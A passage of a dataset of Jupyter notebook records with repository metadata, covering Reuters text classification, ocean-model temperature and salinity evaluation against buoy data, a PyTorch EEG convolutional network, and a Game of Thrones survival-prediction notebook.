precision = precision_score(test_labels, predictions, average='macro')\n recall = recall_score(test_labels, predictions, average='macro')\n f1 = f1_score(test_labels, predictions, average='macro')\n\n print(\"Macro-average quality numbers\")\n print(\"Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}\".format(precision, recall, f1))", "_____no_output_____" ], [ "documents = reuters.fileids()\n\ntrain_docs_id = list(filter(lambda doc: doc.startswith(\"train\"), documents))\ntest_docs_id = list(filter(lambda doc: doc.startswith(\"test\"), documents))\n\ntrain_docs = [reuters.raw(doc_id) for doc_id in train_docs_id]\ntest_docs = [reuters.raw(doc_id) for doc_id in test_docs_id]", "_____no_output_____" ], [ "# Transform multilabel labels\nmlb = MultiLabelBinarizer()\ntrain_labels = mlb.fit_transform([reuters.categories(doc_id) for doc_id in train_docs_id]) \ntest_labels = mlb.transform([reuters.categories(doc_id) for doc_id in test_docs_id])", "_____no_output_____" ], [ "# TFIDF Experiment\n\nmodel = OneVsRestClassifier(LinearSVC(random_state=42))\nvectorised_train_docs, vectorised_test_docs = represent_tfidf(train_docs, test_docs)\n\nmodel.fit(vectorised_train_docs, train_labels)\npredictions = model.predict(vectorised_test_docs)\nevaluate(test_labels, predictions)", "_____no_output_____" ], [ "# Embeddings Experiment\n\nmodel = OneVsRestClassifier(LinearSVC(random_state=42))\nvectorised_train_docs, vectorised_test_docs = represent_doc2vec(train_docs, test_docs)\n\nmodel.fit(vectorised_train_docs, train_labels)\npredictions = model.predict(vectorised_test_docs)\nevaluate(test_labels, predictions)", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1e7038f2db13f9d5ac839ecc10e5b1269a2fda
368,574
ipynb
Jupyter Notebook
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
notebooks/Evaluations/Continuous_Timeseries/All_Depths_ORCA/Hansville/201905_Hindcast/2015_Hansville_Evaluations.ipynb
SalishSeaCast/analysis-keegan
64eb44809a6581c210d02087c11b92a382945529
[ "Apache-2.0" ]
null
null
null
401.496732
83,684
0.936271
[ [ [ "This notebook contains Hovmoller plots that compare the model output over many different depths to the results from the ORCA Buoy data. ", "_____no_output_____" ] ], [ [ "import sys\nsys.path.append('/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools')", "_____no_output_____" ], [ "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport netCDF4 as nc\nimport xarray as xr\nimport datetime as dt\nfrom salishsea_tools import evaltools as et, viz_tools, places\nimport gsw \nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\nimport matplotlib.dates as mdates\nimport cmocean as cmo\nimport scipy.interpolate as sinterp\nimport math\nfrom scipy import io\nimport pickle\nimport cmocean\nimport json\nimport Keegan_eval_tools as ket\nfrom collections import OrderedDict\nfrom matplotlib.colors import LogNorm\n\nfs=16\nmpl.rc('xtick', labelsize=fs)\nmpl.rc('ytick', labelsize=fs)\nmpl.rc('legend', fontsize=fs)\nmpl.rc('axes', titlesize=fs)\nmpl.rc('axes', labelsize=fs)\nmpl.rc('figure', titlesize=fs)\nmpl.rc('font', size=fs)\nmpl.rc('font', family='sans-serif', weight='normal', style='normal')\n\nimport warnings\n#warnings.filterwarnings('ignore')\nfrom IPython.display import Markdown, display\n\n%matplotlib inline", "_____no_output_____" ], [ "ptrcloc='/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data'\nmodver='HC201905' #HC202007 is the other option. \ngridloc='/ocean/kflanaga/MEOPAR/savedData/201905_grid_data'\nORCAloc='/ocean/kflanaga/MEOPAR/savedData/ORCAData'\nyear=2019\nmooring='Twanoh'", "_____no_output_____" ], [ "# Parameters\nyear = 2015\nmodver = \"HC201905\"\nmooring = \"Hansville\"\nptrcloc = \"/ocean/kflanaga/MEOPAR/savedData/201905_ptrc_data\"\ngridloc = \"/ocean/kflanaga/MEOPAR/savedData/201905_grid_data\"\nORCAloc = \"/ocean/kflanaga/MEOPAR/savedData/ORCAData\"\n", "_____no_output_____" ], [ "orca_dict=io.loadmat(f'{ORCAloc}/{mooring}.mat')", "_____no_output_____" ], [ "def ORCA_dd_to_dt(date_list):\n UTC=[]\n for yd in date_list:\n if np.isnan(yd) == True:\n UTC.append(float(\"NaN\"))\n else:\n start = dt.datetime(1999,12,31) \n delta = dt.timedelta(yd) \n offset = start + delta\n time=offset.replace(microsecond=0)\n UTC.append(time)\n return UTC", "_____no_output_____" ], [ "obs_tt=[]\nfor i in range(len(orca_dict['Btime'][1])):\n obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))\n#I should also change this obs_tt thing I have here into datetimes \nYD_rounded=[]\nfor yd in obs_tt:\n if np.isnan(yd) == True:\n YD_rounded.append(float(\"NaN\"))\n else:\n YD_rounded.append(math.floor(yd))\nobs_dep=[]\nfor i in orca_dict['Bdepth']:\n obs_dep.append(np.nanmean(i))", "<ipython-input-7-df801a97040c>:3: RuntimeWarning: Mean of empty slice\n obs_tt.append(np.nanmean(orca_dict['Btime'][:,i]))\n<ipython-input-7-df801a97040c>:13: RuntimeWarning: Mean of empty slice\n obs_dep.append(np.nanmean(i))\n" ], [ "grid=xr.open_mfdataset(gridloc+f'/ts_{modver}_{year}_{mooring}.nc')", "_____no_output_____" ], [ "tt=np.array(grid.time_counter)\nmod_depth=np.array(grid.deptht)\nmod_votemper=(grid.votemper.isel(y=0,x=0))\nmod_vosaline=(grid.vosaline.isel(y=0,x=0))\n\nmod_votemper = (np.array(mod_votemper))\nmod_votemper = np.ma.masked_equal(mod_votemper,0).T\nmod_vosaline = (np.array(mod_vosaline))\nmod_vosaline = np.ma.masked_equal(mod_vosaline,0).T", "_____no_output_____" ], [ "def Process_ORCA(orca_var,depths,dates,year):\n # Transpose the columns so that a yearday column can be added. \n df_1=pd.DataFrame(orca_var).transpose()\n df_YD=pd.DataFrame(dates,columns=['yearday'])\n df_1=pd.concat((df_1,df_YD),axis=1)\n #Group by yearday so that you can take the daily mean values. \n dfg=df_1.groupby(by='yearday')\n df_mean=dfg.mean()\n df_mean=df_mean.reset_index()\n # Convert the yeardays to datetime UTC\n UTC=ORCA_dd_to_dt(df_mean['yearday'])\n df_mean['yearday']=UTC\n # Select the range of dates that you would like. \n df_year=df_mean[(df_mean.yearday >= dt.datetime(year,1,1))&(df_mean.yearday <= dt.datetime(year,12,31))]\n df_year=df_year.set_index('yearday')\n #Add in any missing date values \n idx=pd.date_range(df_year.index[0],df_year.index[-1])\n df_full=df_year.reindex(idx,fill_value=-1)\n #Transpose again so that you can add a depth column. \n df_full=df_full.transpose()\n df_full['depth']=obs_dep\n # Remove any rows that have NA values for depth. \n df_full=df_full.dropna(how='all',subset=['depth'])\n df_full=df_full.set_index('depth')\n #Mask any NA values and any negative values. \n df_final=np.ma.masked_invalid(np.array(df_full))\n df_final=np.ma.masked_less(df_final,0)\n return df_final, df_full.index, df_full.columns", "_____no_output_____" ] ], [ [ "## Map of Buoy Location.", "_____no_output_____" ] ], [ [ "lon,lat=places.PLACES[mooring]['lon lat']\n\nfig, ax = plt.subplots(1,1,figsize = (6,6))\nwith nc.Dataset('/data/vdo/MEOPAR/NEMO-forcing/grid/bathymetry_201702.nc') as bathy:\n viz_tools.plot_coastline(ax, bathy, coords = 'map',isobath=.1)\ncolor=('firebrick')\nax.plot(lon, lat,'o',color = 'firebrick', label=mooring)\nax.set_ylim(47, 49)\nax.legend(bbox_to_anchor=[1,.6,0.45,0])\nax.set_xlim(-124, -122);\nax.set_title('Buoy Location');", "_____no_output_____" ] ], [ [ "## Temperature", "_____no_output_____" ] ], [ [ "df,dep,tim= Process_ORCA(orca_dict['Btemp'],obs_dep,YD_rounded,year)\ndate_range=(dt.datetime(year,1,1),dt.datetime(year,12,31))", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Temperature Series',\n var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)\n\nax=ket.hovmoeller(mod_votemper, mod_depth, tt, (2,15),date_range, title='Modeled Temperature Series',\n var_title='Temperature (C$^0$)',vmax=23,vmin=8,cmap=cmo.cm.thermal)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ] ], [ [ "# Salinity", "_____no_output_____" ] ], [ [ "df,dep,tim= Process_ORCA(orca_dict['Bsal'],obs_dep,YD_rounded,year)", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Absolute Salinity Series',\n var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)\n\nax=ket.hovmoeller(mod_vosaline, mod_depth, tt, (2,15),date_range,title='Modeled Absolute Salinity Series',\n var_title='SA (g/kg)',vmax=31,vmin=14,cmap=cmo.cm.haline)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ], [ "grid.close()", "_____no_output_____" ], [ "bio=xr.open_mfdataset(ptrcloc+f'/ts_{modver}_{year}_{mooring}.nc')", "_____no_output_____" ], [ "tt=np.array(bio.time_counter)\nmod_depth=np.array(bio.deptht)\nmod_flagellatets=(bio.flagellates.isel(y=0,x=0))\nmod_ciliates=(bio.ciliates.isel(y=0,x=0))\nmod_diatoms=(bio.diatoms.isel(y=0,x=0))\n\nmod_Chl = np.array((mod_flagellatets+mod_ciliates+mod_diatoms)*1.8)\nmod_Chl = np.ma.masked_equal(mod_Chl,0).T", "_____no_output_____" ], [ "df,dep,tim= Process_ORCA(orca_dict['Bfluor'],obs_dep,YD_rounded,year)", "_____no_output_____" ], [ "ax=ket.hovmoeller(df,dep,tim,(2,15),date_range,title='Observed Chlorophyll Series',\n var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)\n\nax=ket.hovmoeller(mod_Chl, mod_depth, tt, (2,15),date_range,title='Modeled Chlorophyll Series',\n var_title='Chlorophyll (mg Chl/m$^3$)',vmin=0,vmax=30,cmap=cmo.cm.algae)", "/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools/Keegan_eval_tools.py:816: UserWarning: 'set_params()' not defined for locator of type <class 'matplotlib.dates.AutoDateLocator'>\n plt.locator_params(axis=\"x\", nbins=20)\n" ], [ "bio.close()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e87f975e3e3a00a1f1d30df4edb09159baaf1
81,366
ipynb
Jupyter Notebook
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
15
2019-05-11T02:35:09.000Z
2022-03-22T09:17:28.000Z
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
1
2020-09-23T11:05:22.000Z
2020-09-23T13:40:01.000Z
CNNResults/project_cnn_full_hyperparam_run_20_12.ipynb
ruizhi92/EE239AS_Project
9b9bc46a45d75f4778ba945e1b6c6221276c4a35
[ "MIT" ]
9
2018-03-14T23:48:03.000Z
2022-02-05T13:13:16.000Z
240.727811
68,872
0.899626
[ [ [ "import torch\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport h5py\nfrom data_utils import get_data\nimport matplotlib.pyplot as plt\nfrom solver_pytorch import Solver", "_____no_output_____" ], [ "# Load data from all .mat files, combine them, eliminate EOG signals, shuffle and \n# seperate training data, validation data and testing data.\n# Also do mean subtraction on x.\n\ndata = get_data('../project_datasets',num_validation=100, num_test=100)\nfor k in data.keys():\n print('{}: {} '.format(k, data[k].shape))", "X_train: (2358, 22, 1000) \ny_train: (2358,) \nX_val: (100, 22, 1000) \ny_val: (100,) \nX_test: (100, 22, 1000) \ny_test: (100,) \n" ], [ "# class flatten to connect to FC layer\nclass Flatten(nn.Module):\n def forward(self, x):\n N, C, H = x.size() # read in N, C, H\n return x.view(N, -1)", "_____no_output_____" ], [ "# turn x and y into torch type tensor\n\ndtype = torch.FloatTensor\n\nX_train = Variable(torch.Tensor(data.get('X_train'))).type(dtype)\ny_train = Variable(torch.Tensor(data.get('y_train'))).type(torch.IntTensor)\nX_val = Variable(torch.Tensor(data.get('X_val'))).type(dtype)\ny_val = Variable(torch.Tensor(data.get('y_val'))).type(torch.IntTensor)\nX_test = Variable(torch.Tensor(data.get('X_test'))).type(dtype)\ny_test = Variable(torch.Tensor(data.get('y_test'))).type(torch.IntTensor)", "_____no_output_____" ], [ "# train a 1D convolutional neural network\n# optimize hyper parameters\nbest_model = None\nparameters =[] # a list of dictionaries\nparameter = {} # a dictionary\nbest_params = {} # a dictionary\nbest_val_acc = 0.0\n\n# hyper parameters in model\nfilter_nums = [20]\n\nfilter_sizes = [12]\npool_sizes = [4]\n\n# hyper parameters in solver\nbatch_sizes = [100]\nlrs = [5e-4]\n\nfor filter_num in filter_nums:\n for filter_size in filter_sizes:\n for pool_size in pool_sizes:\n linear_size = int((X_test.shape[2]-filter_size)/4)+1\n linear_size = int((linear_size-pool_size)/pool_size)+1\n linear_size *= filter_num\n for batch_size in batch_sizes:\n for lr in lrs:\n model = nn.Sequential(\n nn.Conv1d(22, filter_num, kernel_size=filter_size, stride=4),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n nn.BatchNorm1d(num_features=filter_num),\n nn.MaxPool1d(kernel_size=pool_size, stride=pool_size),\n Flatten(),\n nn.Linear(linear_size, 20),\n nn.ReLU(inplace=True),\n nn.Linear(20, 4)\n )\n\n model.type(dtype)\n\n solver = Solver(model, data,\n lr = lr, batch_size=batch_size,\n verbose=True, print_every=50)\n\n solver.train()\n\n # save training results and parameters of neural networks\n parameter['filter_num'] = filter_num\n parameter['filter_size'] = filter_size\n parameter['pool_size'] = pool_size\n parameter['batch_size'] = batch_size\n parameter['lr'] = lr\n parameters.append(parameter)\n\n print('Accuracy on the validation set: ', solver.best_val_acc)\n print('parameters of the best model:')\n print(parameter)\n\n if solver.best_val_acc > best_val_acc:\n best_val_acc = solver.best_val_acc\n best_model = model\n best_solver = solver\n best_params = parameter\n \n\n", "(Iteration 1 / 1150) loss: 1.399668\n(Epoch 0 / 50) train acc: 0.260390; val_acc: 0.190000\n(Epoch 1 / 50) train acc: 0.365564; val_acc: 0.380000\n(Epoch 2 / 50) train acc: 0.420696; val_acc: 0.370000\n(Iteration 51 / 1150) loss: 1.267973\n(Epoch 3 / 50) train acc: 0.477523; val_acc: 0.380000\n(Epoch 4 / 50) train acc: 0.482188; val_acc: 0.390000\n(Iteration 101 / 1150) loss: 1.124447\n(Epoch 5 / 50) train acc: 0.532655; val_acc: 0.430000\n(Epoch 6 / 50) train acc: 0.586090; val_acc: 0.550000\n(Iteration 151 / 1150) loss: 1.019976\n(Epoch 7 / 50) train acc: 0.614504; val_acc: 0.460000\n(Epoch 8 / 50) train acc: 0.651399; val_acc: 0.530000\n(Iteration 201 / 1150) loss: 0.859481\n(Epoch 9 / 50) train acc: 0.666667; val_acc: 0.530000\n(Epoch 10 / 50) train acc: 0.680662; val_acc: 0.520000\n(Iteration 251 / 1150) loss: 0.881359\n(Epoch 11 / 50) train acc: 0.689143; val_acc: 0.600000\n(Epoch 12 / 50) train acc: 0.708227; val_acc: 0.590000\n(Epoch 13 / 50) train acc: 0.728584; val_acc: 0.600000\n(Iteration 301 / 1150) loss: 0.624405\n(Epoch 14 / 50) train acc: 0.739610; val_acc: 0.640000\n(Epoch 15 / 50) train acc: 0.747243; val_acc: 0.570000\n(Iteration 351 / 1150) loss: 0.576162\n(Epoch 16 / 50) train acc: 0.751908; val_acc: 0.590000\n(Epoch 17 / 50) train acc: 0.765903; val_acc: 0.640000\n(Iteration 401 / 1150) loss: 0.619740\n(Epoch 18 / 50) train acc: 0.768872; val_acc: 0.630000\n(Epoch 19 / 50) train acc: 0.759966; val_acc: 0.590000\n(Iteration 451 / 1150) loss: 0.525725\n(Epoch 20 / 50) train acc: 0.789652; val_acc: 0.660000\n(Epoch 21 / 50) train acc: 0.785835; val_acc: 0.660000\n(Iteration 501 / 1150) loss: 0.637972\n(Epoch 22 / 50) train acc: 0.790076; val_acc: 0.590000\n(Epoch 23 / 50) train acc: 0.810008; val_acc: 0.640000\n(Iteration 551 / 1150) loss: 0.479225\n(Epoch 24 / 50) train acc: 0.818066; val_acc: 0.620000\n(Epoch 25 / 50) train acc: 0.806192; val_acc: 0.580000\n(Epoch 26 / 50) train acc: 0.810433; val_acc: 0.640000\n(Iteration 601 / 1150) loss: 0.563112\n(Epoch 27 / 50) train acc: 0.818914; val_acc: 0.630000\n(Epoch 28 / 50) train acc: 0.822307; val_acc: 0.530000\n(Iteration 651 / 1150) loss: 0.470543\n(Epoch 29 / 50) train acc: 0.836726; val_acc: 0.610000\n(Epoch 30 / 50) train acc: 0.834182; val_acc: 0.670000\n(Iteration 701 / 1150) loss: 0.442307\n(Epoch 31 / 50) train acc: 0.847328; val_acc: 0.650000\n(Epoch 32 / 50) train acc: 0.839271; val_acc: 0.590000\n(Iteration 751 / 1150) loss: 0.427328\n(Epoch 33 / 50) train acc: 0.861323; val_acc: 0.640000\n(Epoch 34 / 50) train acc: 0.853690; val_acc: 0.650000\n(Iteration 801 / 1150) loss: 0.432014\n(Epoch 35 / 50) train acc: 0.861323; val_acc: 0.640000\n(Epoch 36 / 50) train acc: 0.858355; val_acc: 0.620000\n(Iteration 851 / 1150) loss: 0.336873\n(Epoch 37 / 50) train acc: 0.857930; val_acc: 0.690000\n(Epoch 38 / 50) train acc: 0.870653; val_acc: 0.630000\n(Epoch 39 / 50) train acc: 0.880407; val_acc: 0.660000\n(Iteration 901 / 1150) loss: 0.437571\n(Epoch 40 / 50) train acc: 0.871077; val_acc: 0.660000\n(Epoch 41 / 50) train acc: 0.863020; val_acc: 0.710000\n(Iteration 951 / 1150) loss: 0.299970\n(Epoch 42 / 50) train acc: 0.879559; val_acc: 0.590000\n(Epoch 43 / 50) train acc: 0.879135; val_acc: 0.650000\n(Iteration 1001 / 1150) loss: 0.340088\n(Epoch 44 / 50) train acc: 0.887193; val_acc: 0.580000\n(Epoch 45 / 50) train acc: 0.879983; val_acc: 0.590000\n(Iteration 1051 / 1150) loss: 0.373949\n(Epoch 46 / 50) train acc: 0.888041; val_acc: 0.630000\n(Epoch 47 / 50) train acc: 0.899915; val_acc: 0.640000\n(Iteration 1101 / 1150) loss: 0.329998\n(Epoch 48 / 50) train acc: 0.888465; val_acc: 0.610000\n(Epoch 49 / 50) train acc: 0.893554; val_acc: 0.570000\n(Epoch 50 / 50) train acc: 0.889313; val_acc: 0.590000\nAccuracy on the validation set: 0.71\nparameters of the best model:\n{'filter_num': 20, 'filter_size': 12, 'pool_size': 4, 'batch_size': 100, 'lr': 0.0005}\n" ], [ "# Plot the loss function and train / validation accuracies of the best model\nplt.subplot(2,1,1)\nplt.plot(best_solver.loss_history)\nplt.title('Training loss history')\nplt.xlabel('Iteration')\nplt.ylabel('Training loss')\n\nplt.subplot(2,1,2)\nplt.plot(best_solver.train_acc_history, '-o', label='train accuracy')\nplt.plot(best_solver.val_acc_history, '-o', label='validation accuracy')\nplt.xlabel('Iteration')\nplt.ylabel('Accuracies')\nplt.legend(loc='upper center', ncol=4)\n\nplt.gcf().set_size_inches(10, 10)\nplt.show()\n\nprint('Accuracy on the validation set: ', best_val_acc)\nprint('parameters of the best model:')\nprint(best_params)", "_____no_output_____" ], [ "# test set\ny_test_pred = model(X_test)\n \n_, y_pred = torch.max(y_test_pred,1)\ntest_accu = np.mean(y_pred.data.numpy() == y_test.data.numpy())\nprint('Test accuracy', test_accu, '\\n') ", "Test accuracy 0.6 \n\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e8dba60bbdbcc1ef47acb9bd11b77c1547580
564
ipynb
Jupyter Notebook
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
1
2021-06-25T06:16:50.000Z
2021-06-25T06:16:50.000Z
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
6
2020-09-04T07:32:29.000Z
2021-07-08T11:04:02.000Z
development/logging/logging_test.ipynb
statisticsnorway/SSB_Spark_tools
95271519b0babcfbc9ec2c93503e287d776eaedb
[ "Apache-2.0" ]
null
null
null
17.090909
35
0.530142
[]
[]
[]
cb1e9d85c96efd8ca8c324a74f1f24f138ec061f
288,396
ipynb
Jupyter Notebook
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
Mod1/app_comparacao_modelo_cap_4/cap4FAM.ipynb
spedison/Curso_igti_ML
0410c2b2d06dd55aedfddec9853a4bfa6e4ad309
[ "CC0-1.0" ]
null
null
null
288,396
288,396
0.865258
[ [ [ "from sklearn import datasets #sklearn é uma das lib mais utilizadas em ML, ela contém, além dos \n #datasets, várias outras funções úteis para a análise de dados\n # essa lib será sua amiga durante toda sua carreira\nimport pandas as pd # importa a lib Pandas. Essa lib é utilizada para lidar com dataframes (TABELAS) \n #de forma mais amigável. \nfrom sklearn.model_selection import train_test_split,KFold,cross_val_score, cross_val_predict # esse método é utilizado para dividir o \n # conjunto de dados em grupos de treinamento e test\nfrom sklearn.svm import SVC #importa o algoritmo svm para ser utilizado \nfrom sklearn import tree # importa o algoritmo arvore de decisão\nfrom sklearn.linear_model import LogisticRegression #importa o algoritmo de regressão logística\nfrom sklearn.metrics import mean_absolute_error #utilizada para o calculo do MAE\nfrom sklearn.metrics import mean_squared_error #utilizada para o calculo do MSE\nfrom sklearn.metrics import r2_score #utilizada para o calculo do R2\nfrom sklearn import metrics #utilizada para as métricas de comparação entre os métodos\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier \nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\n", "/usr/local/lib/python3.6/dist-packages/statsmodels/tools/_testing.py:19: FutureWarning: pandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.\n import pandas.util.testing as tm\n" ], [ "from google.colab import drive\ndrive.mount('/content/drive')", "Mounted at /content/drive\n" ], [ "got_dataset=pd.read_csv('/content/drive/My Drive/Colab Notebooks/IGTI/app_comparacao_modelo_cap_4/character-predictions.csv') \n##../input/game-of-thrones/character-predictions.csv') #realiza a leitura do dataset", "_____no_output_____" ], [ "got_dataset.info() #conhecendo o dataset", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 1946 entries, 0 to 1945\nData columns (total 33 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 S.No 1946 non-null int64 \n 1 actual 1946 non-null int64 \n 2 pred 1946 non-null int64 \n 3 alive 1946 non-null float64\n 4 plod 1946 non-null float64\n 5 name 1946 non-null object \n 6 title 938 non-null object \n 7 male 1946 non-null int64 \n 8 culture 677 non-null object \n 9 dateOfBirth 433 non-null float64\n 10 DateoFdeath 444 non-null float64\n 11 mother 21 non-null object \n 12 father 26 non-null object \n 13 heir 23 non-null object \n 14 house 1519 non-null object \n 15 spouse 276 non-null object \n 16 book1 1946 non-null int64 \n 17 book2 1946 non-null int64 \n 18 book3 1946 non-null int64 \n 19 book4 1946 non-null int64 \n 20 book5 1946 non-null int64 \n 21 isAliveMother 21 non-null float64\n 22 isAliveFather 26 non-null float64\n 23 isAliveHeir 23 non-null float64\n 24 isAliveSpouse 276 non-null float64\n 25 isMarried 1946 non-null int64 \n 26 isNoble 1946 non-null int64 \n 27 age 433 non-null float64\n 28 numDeadRelations 1946 non-null int64 \n 29 boolDeadRelations 1946 non-null int64 \n 30 isPopular 1946 non-null int64 \n 31 popularity 1946 non-null float64\n 32 isAlive 1946 non-null int64 \ndtypes: float64(10), int64(15), object(8)\nmemory usage: 501.8+ KB\n" ], [ "got_dataset.head() #mostrando o dataset", "_____no_output_____" ], [ "nans = got_dataset.isna().sum() #contando a quantidade de valores nulos\nprint(nans[nans > 0])\nprint(\"-------\")\nprint(nans)", "title 1008\nculture 1269\ndateOfBirth 1513\nDateoFdeath 1502\nmother 1925\nfather 1920\nheir 1923\nhouse 427\nspouse 1670\nisAliveMother 1925\nisAliveFather 1920\nisAliveHeir 1923\nisAliveSpouse 1670\nage 1513\ndtype: int64\n-------\nS.No 0\nactual 0\npred 0\nalive 0\nplod 0\nname 0\ntitle 1008\nmale 0\nculture 1269\ndateOfBirth 1513\nDateoFdeath 1502\nmother 1925\nfather 1920\nheir 1923\nhouse 427\nspouse 1670\nbook1 0\nbook2 0\nbook3 0\nbook4 0\nbook5 0\nisAliveMother 1925\nisAliveFather 1920\nisAliveHeir 1923\nisAliveSpouse 1670\nisMarried 0\nisNoble 0\nage 1513\nnumDeadRelations 0\nboolDeadRelations 0\nisPopular 0\npopularity 0\nisAlive 0\ndtype: int64\n" ], [ "#Tamanho do dataset\nlen(got_dataset)", "_____no_output_____" ], [ "got_dataset.describe()", "_____no_output_____" ], [ "# analisando os dados nulos\nprint(got_dataset[\"age\"].mean()) #possível erro no nosso dataset (média negativa para a idade?)", "-1293.5635103926097\n" ], [ "# realizando uma maior análise do dataset\nprint(got_dataset[\"name\"][got_dataset[\"age\"] < 0])\nprint(\"---\")\nprint(got_dataset['age'][got_dataset['age'] < 0])", "Series([], Name: name, dtype: object)\n---\nSeries([], Name: age, dtype: float64)\n" ], [ "#substituindo os valores negativos\ngot_dataset.loc[1684, \"age\"] = 25.0\ngot_dataset.loc[1868, \"age\"] = 0.0", "_____no_output_____" ], [ "print(got_dataset[\"age\"].mean()) #verificando, novamente, a idade", "36.70438799076271\n" ], [ "#trabalhando com dados nulos\ngot_dataset[\"age\"].fillna(got_dataset[\"age\"].mean(), inplace=True) #substituindo os valores nulos pela média da coluna\ngot_dataset[\"culture\"].fillna(\"\", inplace=True) #preenchendo os valores nulos da coluna cultura com uma string nula\n\n# preenchendo os demais valores com -1\ngot_dataset.fillna(value=-1, inplace=True)", "_____no_output_____" ], [ "#realizando o boxplot \ngot_dataset.boxplot(['alive','popularity'])", "_____no_output_____" ], [ "#analisando a \"mortalidade\" dos personagens\nimport warnings\nwarnings.filterwarnings('ignore')\nf,ax=plt.subplots(2,2,figsize=(17,15))\nsns.violinplot(\"isPopular\", \"isNoble\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[0, 0])\nax[0, 0].set_title('Noble and Popular vs Mortality')\nax[0, 0].set_yticks(range(2))\n\nsns.violinplot(\"isPopular\", \"male\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[0, 1])\nax[0, 1].set_title('Male and Popular vs Mortality')\nax[0, 1].set_yticks(range(2))\n\nsns.violinplot(\"isPopular\", \"isMarried\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[1, 0])\nax[1, 0].set_title('Married and Popular vs Mortality')\nax[1, 0].set_yticks(range(2))\n\n\nsns.violinplot(\"isPopular\", \"book1\", hue=\"isAlive\", data=got_dataset ,split=True, ax=ax[1, 1])\nax[1, 1].set_title('Book_1 and Popular vs Mortality')\nax[1, 1].set_yticks(range(2))\n\n\nplt.show()", "_____no_output_____" ], [ "# Retirando algumas colunas \ndrop = [\"S.No\", \"pred\", \"alive\", \"plod\", \"name\", \"isAlive\", \"DateoFdeath\"]\ngot_dataset.drop(drop, inplace=True, axis=1)\n\n#Salvando uma cópia do dataset para aplicar o hotencoder\ngot_dataset_2 = got_dataset.copy(deep=True)", "_____no_output_____" ], [ "# transformando os dados categóricos em one-hot-encoder\ngot_dataset = pd.get_dummies(got_dataset)", "_____no_output_____" ], [ "got_dataset.head(10)", "_____no_output_____" ], [ "got_dataset.shape", "_____no_output_____" ], [ "# Separando o dataset entre entradas e saídas\nx = got_dataset.iloc[:,1:].values\ny = got_dataset.iloc[:, 0].values\nprint(x.shape)\nprint(y.shape)", "(1946, 1011)\n(1946,)\n" ] ], [ [ "** Iniciando a contrução do pipeline do algoritmo **", "_____no_output_____" ] ], [ [ "# aplicando o modelo de validação cruzada\n# divide o dataset entre 5 diferentes grupos\nkfold = KFold(n_splits=5, shuffle=True, random_state=42)\nprint(kfold.get_n_splits())", "5\n" ], [ "# construindo os modelos de classificação\nmodelos = 